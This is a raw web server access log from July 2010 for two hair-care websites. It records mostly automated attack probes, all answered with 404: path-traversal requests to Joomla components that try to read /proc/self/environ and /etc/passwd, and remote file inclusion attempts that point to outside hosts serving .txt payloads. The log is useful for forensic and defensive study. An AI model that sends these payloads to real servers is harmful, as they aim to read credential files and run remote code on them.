200.195.246.74 - - [12/Jul/2010:08:04:56 -0700] "GET /index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:04:58 -0700] "GET /logs//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:05:05 -0700] "GET /logs/access.log//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:05:05 -0700] "GET /index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:05:07 -0700] "GET /logs//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:05:12 -0700] "GET /logs/access.log/index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:05:12 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:05:13 -0700] "GET /logs/index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:05:14 -0700] "GET /logs/access.log//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:05:16 -0700] "GET /index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:05:17 -0700] "GET /logs/access.log//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:05:18 -0700] "GET /logs//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:05:20 -0700] "GET /logs/access.log/index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:05:21 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:05:25 -0700] "GET /logs/index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:05:26 -0700] "GET /index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:05:31 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:05:32 -0700] "GET /logs//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:05:37 -0700] "GET /index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:05:51 -0700] "GET /index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:05:52 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:05:53 -0700] "GET /index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:05:55 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:06:06 -0700] "GET /logs/access.log/index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:06:10 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:06:11 -0700] "GET /logs/index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:06:26 -0700] "GET /index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:07:09 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:07:23 -0700] "GET /logs/access.log/index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:07:26 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:07:29 -0700] "GET /logs/index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:07:38 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:08:04 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
208.92.234.103 - - [12/Jul/2010:08:09:02 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
208.92.234.103 - - [12/Jul/2010:08:09:03 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
72.3.233.173 - - [12/Jul/2010:08:09:06 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
72.3.233.173 - - [12/Jul/2010:08:09:06 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
72.3.233.173 - - [12/Jul/2010:08:09:06 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
78.41.204.220 - - [12/Jul/2010:08:09:14 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.postmytrips.com//flashservices/services/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.41.204.220 - - [12/Jul/2010:08:09:14 -0700] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.postmytrips.com//flashservices/services/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.41.204.220 - - [12/Jul/2010:08:09:14 -0700] "GET /logs/access_100503.log%20%20///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.postmytrips.com//flashservices/services/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.41.204.220 - - [12/Jul/2010:08:09:15 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.postmytrips.com//flashservices/services/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.41.204.220 - - [12/Jul/2010:08:09:15 -0700] "GET /logs/access_100503.log%20%20///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.postmytrips.com//flashservices/services/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.41.204.220 - - [12/Jul/2010:08:09:16 -0700] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.postmytrips.com//flashservices/services/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.3.233.173 - - [12/Jul/2010:08:09:24 -0700] "GET /logs/access_100621.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
78.41.204.220 - - [12/Jul/2010:08:09:30 -0700] "GET /logs/access_100419.log%20%20///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.postmytrips.com//flashservices/services/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.92.234.103 - - [12/Jul/2010:08:09:33 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
78.41.204.220 - - [12/Jul/2010:08:09:34 -0700] "GET /logs/access_100419.log%20%20///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.postmytrips.com//flashservices/services/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.195.246.74 - - [12/Jul/2010:08:09:42 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:09:43 -0700] "GET /index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
208.92.234.103 - - [12/Jul/2010:08:09:45 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
78.41.204.220 - - [12/Jul/2010:08:10:09 -0700] "GET /logs/access_100426.log%20%20///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.postmytrips.com//flashservices/services/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.41.204.220 - - [12/Jul/2010:08:10:16 -0700] "GET /logs/access_100426.log%20%20///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.postmytrips.com//flashservices/services/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.195.246.74 - - [12/Jul/2010:08:10:19 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
81.19.215.12 - - [12/Jul/2010:08:13:19 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
93.100.234.130 - - [12/Jul/2010:08:15:27 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
129.97.219.71 - - [12/Jul/2010:08:16:20 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)" "growlonghairfast.com"
216.15.238.210 - - [12/Jul/2010:08:17:51 -0700] "GET /logs/access.log/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
216.15.238.210 - - [12/Jul/2010:08:17:51 -0700] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
216.15.238.210 - - [12/Jul/2010:08:17:51 -0700] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
81.19.215.12 - - [12/Jul/2010:08:19:17 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
81.19.215.12 - - [12/Jul/2010:08:19:17 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
81.19.215.12 - - [12/Jul/2010:08:19:17 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
81.19.215.12 - - [12/Jul/2010:08:19:33 -0700] "GET /logs/access_100621.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
93.100.234.130 - - [12/Jul/2010:08:22:00 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
93.100.234.130 - - [12/Jul/2010:08:22:00 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
93.100.234.130 - - [12/Jul/2010:08:22:00 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
93.100.234.130 - - [12/Jul/2010:08:22:19 -0700] "GET /logs/access_100621.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
208.92.234.103 - - [12/Jul/2010:08:25:59 -0700] "GET /logs/access_100628.log//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
208.92.234.103 - - [12/Jul/2010:08:25:59 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
208.92.234.103 - - [12/Jul/2010:08:25:59 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
93.100.234.130 - - [12/Jul/2010:08:26:11 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
93.100.234.130 - - [12/Jul/2010:08:26:12 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
93.100.234.130 - - [12/Jul/2010:08:26:12 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
93.100.234.130 - - [12/Jul/2010:08:26:25 -0700] "GET /logs/access_100621.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
208.92.234.103 - - [12/Jul/2010:08:27:04 -0700] "GET /logs/access_100705.log//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
208.92.234.103 - - [12/Jul/2010:08:27:46 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
208.92.234.103 - - [12/Jul/2010:08:27:46 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
208.92.234.103 - - [12/Jul/2010:08:27:46 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
93.187.141.58 - - [12/Jul/2010:08:28:19 -0700] "GET /logs/pccookbook.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.187.141.58 - - [12/Jul/2010:08:28:19 -0700] "GET /pccookbook.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.187.141.58 - - [12/Jul/2010:08:28:19 -0700] "GET /logs/access_100503.log%20%20/pccookbook.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.187.141.58 - - [12/Jul/2010:08:28:59 -0700] "GET /logs/access.log/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
93.187.141.58 - - [12/Jul/2010:08:29:04 -0700] "GET /sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
93.187.141.58 - - [12/Jul/2010:08:29:04 -0700] "GET /logs/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.115.111.248 - - [12/Jul/2010:08:29:25 -0700] "GET /freehairsecretsphp/viewtopic.php?p=346 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:08:29:25 -0700] "GET /freehairsecretsphp/viewtopic.php?p=401 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:08:29:25 -0700] "GET /freehairsecretsphp/viewtopic.php?p=675 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:08:29:26 -0700] "GET /freehairsecretsphp/viewtopic.php?p=701 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:08:29:26 -0700] "GET /freehairsecretsphp/viewtopic.php?p=722 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:08:29:28 -0700] "GET /logs/access_090824.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:08:29:28 -0700] "GET /freehairsecretsphp/viewtopic.php?p=921 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:08:29:29 -0700] "GET /logs/access_090831.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:08:29:29 -0700] "GET /logs/access_090907.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:08:29:30 -0700] "GET /logs/access_090914.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
93.187.141.58 - - [12/Jul/2010:08:30:51 -0700] "GET /logs/access_100503.log%20%20/pccookbook.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.187.141.58 - - [12/Jul/2010:08:30:51 -0700] "GET /logs/pccookbook.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.187.141.58 - - [12/Jul/2010:08:30:53 -0700] "GET /pccookbook.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.92.234.103 - - [12/Jul/2010:08:31:33 -0700] "GET /logs/access_100628.log//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
208.92.234.103 - - [12/Jul/2010:08:31:33 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
208.92.234.103 - - [12/Jul/2010:08:31:33 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
78.41.204.220 - - [12/Jul/2010:08:32:32 -0700] "GET /index.php?option=com_php&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
208.92.234.103 - - [12/Jul/2010:08:33:16 -0700] "GET /logs/access_100705.log//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
129.97.219.71 - - [12/Jul/2010:08:33:50 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Opera/9.64(Windows NT 5.1; U; en) Presto/2.1.1" "growlonghairfast.com"
208.92.234.103 - - [12/Jul/2010:08:33:51 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
208.92.234.103 - - [12/Jul/2010:08:33:52 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
208.92.234.103 - - [12/Jul/2010:08:33:52 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
93.187.141.58 - - [12/Jul/2010:08:35:37 -0700] "GET /logs/access_100517.log%20%20/pccookbook.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.135.41.16 - - [12/Jul/2010:08:35:48 -0700] "GET /index.php?option=com_php&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
66.135.41.16 - - [12/Jul/2010:08:35:48 -0700] "GET /index.php?option=com_php&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
78.41.204.220 - - [12/Jul/2010:08:37:10 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
93.187.141.58 - - [12/Jul/2010:08:39:07 -0700] "GET /logs/access_100517.log%20%20/pccookbook.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.41.204.220 - - [12/Jul/2010:08:40:06 -0700] "GET /logs/access.log//index.php?option=com_php&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
78.41.204.220 - - [12/Jul/2010:08:40:06 -0700] "GET /index.php?option=com_php&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
78.41.204.220 - - [12/Jul/2010:08:40:06 -0700] "GET /logs//index.php?option=com_php&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
78.41.204.220 - - [12/Jul/2010:08:40:43 -0700] "GET /logs/access.log//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
78.41.204.220 - - [12/Jul/2010:08:40:43 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
78.41.204.220 - - [12/Jul/2010:08:40:44 -0700] "GET /logs//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
66.135.41.16 - - [12/Jul/2010:08:42:49 -0700] "GET /logs/access.log//index.php?option=com_php&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
66.135.41.16 - - [12/Jul/2010:08:42:49 -0700] "GET /logs/access.log//index.php?option=com_php&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
66.135.41.16 - - [12/Jul/2010:08:42:49 -0700] "GET /index.php?option=com_php&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
66.135.41.16 - - [12/Jul/2010:08:42:49 -0700] "GET /index.php?option=com_php&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
66.135.41.16 - - [12/Jul/2010:08:42:49 -0700] "GET /logs//index.php?option=com_php&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
66.135.41.16 - - [12/Jul/2010:08:42:49 -0700] "GET /logs//index.php?option=com_php&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
93.187.141.58 - - [12/Jul/2010:08:43:01 -0700] "GET /logs/access_100607.log%20%20//extcalendar.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.187.141.58 - - [12/Jul/2010:08:43:01 -0700] "GET /logs//extcalendar.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
